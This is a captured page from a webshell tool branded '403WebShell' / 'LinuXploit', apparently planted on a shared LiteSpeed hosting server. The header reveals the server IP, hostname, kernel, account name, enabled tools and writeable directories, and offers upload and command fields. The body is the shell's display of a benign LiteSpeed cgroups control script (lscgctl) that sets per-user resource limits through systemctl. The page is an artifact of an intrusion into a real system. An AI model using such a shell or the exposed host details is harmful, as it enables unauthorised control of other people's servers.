Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.119.166.141
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/local/lsws/lsns/bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/local/lsws/lsns/bin/lscgctl
#!/usr/bin/python3
import argparse, json, logging, os, pwd, subprocess, sys
import common
from stat import *
from subprocess import PIPE

def command_requires_uid(command):
    """Return True when *command* is one that acts on explicitly named users.

    That is the bare and ``-user`` forms of ``list``, ``reset`` and ``set``.
    """
    user_commands = ('list', 'list-user', 'reset', 'reset-user', 'set', 'set-user')
    return command in user_commands

def validate_environment():
    """Check that this host can be managed and enable accounting if needed.

    Reports a fatal error through ``common.fatal_error`` when the cgroups v2
    controller file is absent or when the effective caller is not root, then
    runs ``common.ls_ok()`` (presumably a LiteSpeed sanity check -- confirm
    against the ``common`` module).  If the systemd accounting drop-in for
    ``user.slice`` does not exist yet, IO/memory/task accounting is switched
    on and systemd is reloaded.
    """
    cgroup_v2_marker = '/sys/fs/cgroup/cgroup.controllers'
    if not os.path.exists(cgroup_v2_marker):
        common.fatal_error("cgroups is not v2 on this machine")

    running_as_root = os.getuid() == 0
    if not running_as_root:
        common.fatal_error("this program must be run as root")

    common.ls_ok()

    accounting_conf = '/etc/systemd/system.control/user.slice.d/50-IOAccounting.conf'
    if os.path.isfile(accounting_conf):
        # Accounting was already activated on an earlier run.
        return
    logging.debug('Activate accounting')
    enable_accounting = ['systemctl', 'set-property', 'user.slice', 'IOAccounting=yes', 'MemoryAccounting=yes', 'TasksAccounting=yes']
    run_program(enable_accounting)
    systemctl_daemon_reload()
    
def init_pgm():
    """Parse the command line, set up logging and validate the request.

    Returns:
        A tuple ``(args, users)``: ``args`` is the parsed argparse namespace
        and ``users`` is whatever ``common.get_users`` returns for commands
        that act on named users, or ``None`` for every other command.

    The ``version`` command is answered here and ends the process with exit
    status 0.  Invalid requests are reported through ``common.fatal_error``.
    """
    common.init_logging()
    parser = argparse.ArgumentParser(prog="lscgctl",
                                     description='LiteSpeed cgroups Control Program')
    parser.add_argument("command", type=str, help="The cgroups command",
                        choices=['list', 'list-all', 'list-user', 'reset', 'reset-all', 'reset-user', 'set', 'set-all', 'set-user', 'version'])
    parser.add_argument("uid", type=str, nargs='*', default=None, help="uid or user name for -user commands")
    parser.add_argument("--cpu", type=str, help="limit CPU access.  Specify a percentage of a complete core, 100 is 1 complete core.  Default is no limit (-1).")
    parser.add_argument("--io", type=str, help="limit I/O access.  Specify in bytes/sec.  Default is no limit (-1).")
    parser.add_argument("--iops", type=str, help="limit I/O access.  Specify in IOs per second.  Default is no limit (-1).")
    parser.add_argument('-l', '--log', type=int, help='set logging level, 10=Debug, 20=Info, 30=Warning, 40=Error.  Default is Info')
    parser.add_argument("--mem", type=str, help="limit virtual memory access.  Specify in bytes.  Default is no limit (-1).")
    parser.add_argument('-q', '--quiet', action='store_true', help='turns off all logging and only outputs what is requested.')
    parser.add_argument("--tasks", type=str, help="limit number of tasks.  Specify a maximum count of tasks that can be started.")
    args = parser.parse_args()

    # The log level is left untouched only when --quiet is given without an
    # explicit --log level.
    if not args.quiet or args.log is not None:
        if args.log is not None:
            logging.getLogger().setLevel(args.log)
        else:
            logging.getLogger().setLevel(logging.INFO)
        logging.debug("Entering lscgctl")

    validate_environment()
    command = args.command
    if command_requires_uid(command):
        # argparse stores an empty list (not None) when a nargs='*'
        # positional is omitted, so test for emptiness; a comparison with
        # None would never report the missing user.
        if not args.uid:
            common.fatal_error("You must specify a user for the %s command" % command)
        users = common.get_users(args.uid)
    else:
        users = None
    if command == 'version':
        logging.info("Version: %s" % common.VERSION)
        if args.quiet:
            print(common.VERSION)
        sys.exit(0)
    limits = (args.cpu, args.io, args.iops, args.mem, args.tasks)
    if command.startswith('set') and all(limit is None for limit in limits):
        common.fatal_error("You specified command: %s and no qualifier to set with it" % command)
    return args, users

def read_stat(file, pos):
    """Return field number *pos* of the first line of *file*.

    The first line is split on single spaces; fields are not stripped, so
    the last field keeps its trailing newline.

    Args:
        file: path of the file to read.
        pos: index of the wanted field.

    Raises:
        IndexError: if the first line has no field at *pos*.

    A failure to open the file is reported through ``common.fatal_error``.
    """
    try:
        f = open(file, 'r')
    except Exception as err:
        common.fatal_error('Error opening %s: %s' % (file, err))
    # The context manager closes the handle even when readline() raises.
    with f:
        line = f.readline()
    pieces = line.split(' ')
    return pieces[pos]

def run_program(args, fail_reason = ""):
    """Run an external program and return its standard output as text.

    Args:
        args: argument vector handed to ``subprocess.run``.
        fail_reason: leave empty when the program is expected to succeed.
            When non-empty the program is expected to FAIL, and the text is
            used in the error raised if it succeeds instead.

    Returns:
        The program's stdout decoded as UTF-8.

    An outcome opposite to the expected one is reported through
    ``common.fatal_error``.
    """
    logging.debug('run: ' + str(args))
    completed = subprocess.run(args, stdout=PIPE, stderr=PIPE)
    succeeded = completed.returncode == 0
    expect_failure = fail_reason != ""
    if expect_failure:
        if succeeded:
            common.fatal_error('Expected: ' + args[0] + ' to fail: ' + fail_reason)
    elif not succeeded:
        common.fatal_error('Error in running: ' + args[0] + ' errors: ' + completed.stdout.decode('utf-8') + ' ' + completed.stderr.decode('utf-8'))
    return completed.stdout.decode('utf-8')

def user_to_file(user):
    """Return the systemd slice unit name for *user*, built from its ``pw_uid``."""
    uid = user.pw_uid
    return 'user-%s.slice' % uid

def user_to_filename(user):
    """Return the path of *user*'s slice directory under the cgroup ``user.slice`` tree."""
    slice_name = user_to_file(user)
    return '/sys/fs/cgroup/user.slice/%s' % slice_name

def systemctl_show(user):
    """Return the text printed by ``systemctl show`` for *user*'s slice unit."""
    show_cmd = ['systemctl', 'show', user_to_file(user)]
    return run_program(show_cmd)

def systemctl_daemon_reload():
    """Run ``systemctl daemon-reload``; the command output is discarded."""
    logging.debug("Do daemon-reload")
    reload_cmd = ['systemctl', 'daemon-reload']
    run_program(reload_cmd)

def get_systemctl_item(result, item):
    """Extract the value of property *item* from ``systemctl show`` output.

    Args:
        result: text made of ``Name=value`` lines.
        item: exact property name to look up.

    Returns:
        The text after the first ``=`` on the first line whose name is
        exactly *item*.  An empty string is returned when the property is
        missing or when its value is ``infinity`` (no limit).
    """
    # Compare whole property names line by line.  A plain substring search
    # would also hit longer names that merely contain `item` (for example
    # "EffectiveMemoryMax" when looking for "MemoryMax") or text inside
    # another property's value.
    for line in result.split('\n'):
        name, sep, value = line.partition('=')
        if sep and name == item:
            break
    else:
        logging.debug('%s not found in systemctl output' % item)
        return ""
    if value == 'infinity':
        return ''
    logging.debug('systemctl show for ' + item + ':' + value)
    return value
    
def get_systemctl_dev_num(result, item):
    """Return the numeric part of a ``<device> <number>`` property value.

    The value of *item* is looked up in *result*; everything after its first
    space is passed to ``common.str_num_values``.  An empty string is
    returned when the value contains no space.
    """
    raw = get_systemctl_item(result, item)
    _device, sep, amount = raw.partition(' ')
    if not sep:
        return ''
    logging.debug('result %s: %s, val: %s' % (item, raw, amount))
    return common.str_num_values(amount)

def get_systemctl_num(result, item):
    """Look up property *item* in *result* and format it with ``common.str_num_values``."""
    raw = get_systemctl_item(result, item)
    logging.debug('result %s: %s' % (item, raw))
    formatted = common.str_num_values(raw)
    return formatted

def get_systemctl_cpu(result):
    """Return the CPU quota found in ``systemctl show`` output as a percent string.

    The ``CPUQuotaPerSecUSec`` property is CPU time per second, so 10ms
    equals 1% of one core (the scale used by the ``--cpu`` option).

    Args:
        result: text printed by ``systemctl show`` for a slice.

    Returns:
        ``''`` when no quota is set, otherwise the quota as text: whole
        percent for values of 10ms and above, ``0.N`` for N below 10ms, and
        a ``%f``-formatted number for a value without a unit suffix.

    Raises:
        ValueError: if the numeric part of the value cannot be parsed.
    """
    val = get_systemctl_item(result, 'CPUQuotaPerSecUSec')
    if val in ('infinity', 'max', ''):
        return ''
    ms = val.find('ms')
    logging.debug('cpu val:' + val + ' ms: %d' % ms)
    if ms > 0:
        millis = int(val[:ms])
        # Floor division: true division would make 5ms yield 0.5, which is
        # never equal to 0, so the sub-1% branch below would be skipped.
        percent = millis // 10
        if percent == 0:
            return '0.%d' % millis
        return '%d' % percent
    s = val.find('s')
    if s > 0:
        return '%d' % int((float(val[:s]) * 100)) # A bug in systemd cgroups
    # Parenthesised on purpose: '%' and '/' share precedence and group left
    # to right, so without the parentheses the formatted string itself would
    # be divided by 10000 and raise TypeError.
    return '%f' % (float(val) / 10000)

def list_user(user, dict):
    """Collect the current limits of *user* and store them in *dict*.

    The limits are read from ``systemctl show`` for the user's slice and
    stored under the key ``user.pw_uid`` as a mapping with the keys
    ``name``, ``cpu``, ``io``, ``iops``, ``mem`` and ``tasks``.  The io and
    iops entries are taken from the read-side properties.
    """
    show_output = systemctl_show(user)
    limits = {
        'name': user.pw_name,
        'cpu': get_systemctl_cpu(show_output),
        'io': get_systemctl_dev_num(show_output, 'IOReadBandwidthMax'),
        'iops': get_systemctl_dev_num(show_output, 'IOReadIOPSMax'),
        'mem': get_systemctl_num(show_output, "MemoryMax"),
        'tasks': get_systemctl_num(show_output, 'TasksMax'),
    }
    logging.debug("uid[" + str(user.pw_uid) + ']: ' + str(limits))
    dict[user.pw_uid] = limits
    
def command_list(users):
    """Print the limits of the selected users as indented JSON and return 0.

    Args:
        users: the passwd entries to report, or ``None`` to report every
            passwd entry whose uid is at least ``common.get_min_uid()`` and
            whose name is not ``nobody``.
    """
    report = {}
    if users is None:
        everyone = pwd.getpwall()
        min_uid = common.get_min_uid()
        selected = [
            entry for entry in everyone
            if entry.pw_uid >= min_uid and entry.pw_name != 'nobody'
        ]
    else:
        selected = users
    for entry in selected:
        list_user(entry, report)
    print(json.dumps(report, indent=4))
    return 0

def set_properties(user, properties):
    """Apply *properties* to *user*'s slice with ``systemctl set-property``.

    Args:
        user: passwd entry identifying the slice.
        properties: iterable of ``Name=value`` strings.

    Returns:
        The output of the ``systemctl`` invocation.
    """
    command_line = ['systemctl', 'set-property', user_to_file(user)] + list(properties)
    return run_program(command_line)

def set_device_parm(args, option, properties):
    """Append per-device I/O limit assignments to *properties*; return 0.

    Args:
        args: parsed command line; ``args.io`` or ``args.iops`` is read.
        option: ``common.OPTION_IO`` selects the bandwidth properties, any
            other value selects the IOPS properties.
        properties: list that receives the ``Name=value`` strings.

    The devices are the first element of ``common.get_devices()``
    (presumably the block devices -- confirm in ``common``).  A limit of -1
    appends one empty read and one empty write assignment (the form this
    script uses to clear a limit); any other limit appends a read and a
    write assignment for every device.
    """
    devices = common.get_devices()[0]
    if option == common.OPTION_IO:
        titles = ('IOReadBandwidthMax', 'IOWriteBandwidthMax')
        requested = args.io
    else:
        titles = ('IOReadIOPSMax', 'IOWriteIOPSMax')
        requested = args.iops
    limit = common.int_num_values(requested)
    for device in devices:
        if limit == -1:
            # Clearing is not device specific, so one pair is enough.
            for title in titles:
                properties.append('%s=' % title)
            break
        for title in titles:
            properties.append('%s=%s %d' % (title, device, limit))
    return 0

def set_no_device_parm(args, option, properties):
    """Append a CPU, memory or task limit assignment to *properties*.

    Args:
        args: parsed command line; ``args.cpu``, ``args.mem`` or
            ``args.tasks`` is read depending on *option*.
        option: ``common.OPTION_CPU`` or ``common.OPTION_MEM``; any other
            value is treated as the task limit.
        properties: list that receives the ``Name=value`` strings.

    A limit of -1 appends an empty assignment (the form this script uses to
    clear a limit).  The memory option additionally appends an empty
    ``MemoryHigh=`` assignment.
    """
    if option == common.OPTION_CPU:
        title, requested, format_set = 'CPUQuota', args.cpu, '%s=%d%%'
    elif option == common.OPTION_MEM:
        title, requested, format_set = 'MemoryMax', args.mem, '%s=%d'
    else:
        title, requested, format_set = 'TasksMax', args.tasks, '%s=%d'
    limit = common.int_num_values(requested)
    assignment = '%s=' % title if limit == -1 else format_set % (title, limit)
    properties.append(assignment)
    if option == common.OPTION_MEM:
        properties.append('MemoryHigh=')

    
def reset_user(args, user, reload):
    """Remove every limit from a single user.

    Args:
        args: parsed command line; its ``cpu``, ``io``, ``iops``, ``mem``
            and ``tasks`` attributes are overwritten with ``'-1'`` (no
            limit).
        user: the passwd entry to reset.
        reload: passed through to ``set_user``; when true, systemd is
            reloaded after the change.

    Returns:
        The return value of ``set_user``.
    """
    args.cpu = '-1'
    args.io = '-1'
    args.iops = '-1'
    args.mem = '-1'
    args.tasks = '-1'
    # set_user iterates over its second argument.  Handing it the bare
    # passwd entry would walk the entry's fields (name, password, uid, ...)
    # and fail on the first one, so wrap the entry in a list.
    return set_user(args, [user], reload)

def command_reset(args, users):
    """Handle the ``reset``, ``reset-user`` and ``reset-all`` commands.

    Args:
        args: parsed command line; ``args.command`` selects the variant and
            ``args.quiet`` suppresses the success message.
        users: passwd entries to reset for ``reset``/``reset-user``; ignored
            for ``reset-all``, which walks every passwd entry whose uid is
            at least ``common.get_min_uid()``.

    Returns:
        0.
    """
    if args.command == 'reset' or args.command == 'reset-user':
        for user in users:
            reset_user(args, user, True)
    else:
        all_users = pwd.getpwall()
        min_uid = common.get_min_uid()
        need_reload = False
        for listuser in all_users:
            if listuser.pw_uid >= min_uid:
                need_reload = True
                # reset_user requires the reload flag.  Pass False here so
                # systemd is reloaded once after the loop instead of once
                # per user.
                reset_user(args, listuser, False)
        if need_reload:
            systemctl_daemon_reload()
    if not args.quiet:
        logging.info("Reset successful")
    return 0

def set_user(args, users, reload):
    """Apply the limits given on the command line to every entry in *users*.

    Args:
        args: parsed command line; each of ``cpu``, ``io``, ``iops``,
            ``mem`` and ``tasks`` that is not ``None`` contributes property
            assignments.
        users: iterable of passwd entries.
        reload: when true, systemd is reloaded after the properties are set.

    Returns:
        The result of ``command_list(users)`` unless ``args.quiet`` is set,
        in which case 0.
    """
    # (args attribute, builder, name of the option constant in `common`),
    # in the order in which the assignments are generated.
    steps = (
        ('cpu', set_no_device_parm, 'OPTION_CPU'),
        ('io', set_device_parm, 'OPTION_IO'),
        ('iops', set_device_parm, 'OPTION_IOPS'),
        ('mem', set_no_device_parm, 'OPTION_MEM'),
        ('tasks', set_no_device_parm, 'OPTION_TASKS'),
    )
    properties = []
    for attr_name, builder, option_name in steps:
        if getattr(args, attr_name) is not None:
            builder(args, getattr(common, option_name), properties)
    for user in users:
        set_properties(user, properties)
    if reload:
        systemctl_daemon_reload()
    if args.quiet:
        return 0
    return command_list(users)

def command_set(args, users):
    """Handle the ``set``, ``set-user`` and ``set-all`` commands.

    Args:
        args: parsed command line; ``args.command`` selects the variant and
            ``args.quiet`` suppresses the success message.
        users: passwd entries to change for ``set``/``set-user``; ignored
            for ``set-all``, which walks every passwd entry whose uid is at
            least ``common.get_min_uid()``.

    Returns:
        0.
    """
    if args.command == 'set' or args.command == 'set-user':
        set_user(args, users, True)
    else:
        all_users = pwd.getpwall()
        min_uid = common.get_min_uid()
        need_reload = False
        for listuser in all_users:
            if listuser.pw_uid >= min_uid:
                need_reload = True
                # set_user iterates over its second argument.  A bare passwd
                # entry would be walked field by field (name, password,
                # uid, ...) and fail, so wrap it in a list.
                set_user(args, [listuser], False)
        if need_reload:
            systemctl_daemon_reload()
    if not args.quiet:
        logging.info("Set successful")
    return 0

def do_pgm(args, users):
    """Dispatch to the handler for ``args.command`` and return its result.

    The command is matched by substring.  ``reset`` is tested first because
    every reset command also contains ``set``.  A command that matches
    nothing is reported through ``common.fatal_error``.
    """
    logging.debug("Entering lscgctl, command: %s" % args.command)
    handlers = (
        ('reset', lambda: command_reset(args, users)),
        ('list', lambda: command_list(users)),
        ('set', lambda: command_set(args, users)),
    )
    for keyword, handler in handlers:
        if keyword in args.command:
            ret = handler()
            break
    else:
        common.fatal_error('Unexpected command: %s' % args.command)
    logging.debug("Exiting lscgctl")
    return ret

def main():
    """Program entry point: initialise, run the requested command, return its code."""
    args, users = init_pgm()
    return do_pgm(args, users)


if __name__ == "__main__":
    # Hand the command's return code to the shell instead of dropping it.
    sys.exit(main())

Youez - 2016 - github.com/yon3zu
LinuXploit